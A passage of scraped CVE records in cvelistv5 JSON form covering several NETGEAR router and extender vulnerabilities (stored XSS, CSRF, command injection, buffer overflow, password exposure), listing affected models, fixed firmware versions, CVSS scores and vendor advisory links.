"value": "Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18700",
"datePublished": "2020-04-24T14:15:11",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:28:56.073Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18848
Vulnerability from cvelistv5
Published
2020-04-20 15:24
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:44.287Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-20T15:24:53",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18848",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by CSRF. This affects R6300v2 before 1.0.0.36, AC1450 before 1.0.0.36, R7300 before 1.0.0.54, and R8500 before 1.0.2.94."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:N/A:H/C:H/I:H/PR:N/S:U/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049011/Security-Advisory-for-Cross-Site-Request-Forgery-on-Some-Routers-PSV-2017-0334"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18848",
"datePublished": "2020-04-20T15:24:53",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:44.287Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18788
Vulnerability from cvelistv5
Published
2020-04-22 13:42
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6150v2 before 1.0.1.54, EX6100v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.18, R6900P before 1.3.0.8, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R8000 before 1.0.4.4_1.1.42, R7900P before 1.1.5.14, R8000P before 1.1.5.14, R8300 before 1.0.2.110, R8500 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.14, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.40, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.975Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6150v2 before 1.0.1.54, EX6100v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.18, R6900P before 1.3.0.8, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R8000 before 1.0.4.4_1.1.42, R7900P before 1.1.5.14, R8000P before 1.1.5.14, R8300 before 1.0.2.110, R8500 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.14, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.40, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-22T13:42:30",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18788",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6150v2 before 1.0.1.54, EX6100v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R7000 before 1.0.9.18, R6900P before 1.3.0.8, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R8000 before 1.0.4.4_1.1.42, R7900P before 1.1.5.14, R8000P before 1.1.5.14, R8300 before 1.0.2.110, R8500 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.14, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.40, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049527/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2947"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18788",
"datePublished": "2020-04-22T13:42:30",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20728
Vulnerability from cvelistv5
Published
2020-04-16 19:05
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.903Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:05:04",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20728",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGND2200Bv4 before 1.0.0.102, DM200 before 1.0.0.52, JNDR3000 before 1.0.0.22, RBK50 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBW30 before 2.1.2.6, R6250 before 1.0.4.26, R6300v2 before 1.0.4.24, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.26, R6900P before 1.3.0.20, R7000P before 1.3.0.20, R7100LG before 1.0.0.40, R7300DST before 1.0.0.62, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, R8900 before 1.0.3.10, R9000 before 1.0.3.10, WNDR3400v3 before 1.0.1.18, WNDR3700v4 before 1.0.2.96, WNDR4300v1 before 1.0.2.98, WNDR4300v2 before 1.0.0.54, WNDR4500v3 before 1.0.0.54, WNR2000v5 before 1.0.0.64, and WNR3500Lv2 before 1.2.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061199/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-WiFi-Systems-PSV-2017-315"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20728",
"datePublished": "2020-04-16T19:05:04",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.903Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-11059
Vulnerability from cvelistv5
Published
2020-04-28 16:20
Modified
2024-08-06 03:47
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:47:34.858Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-01-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-28T16:20:22",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-11059",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, 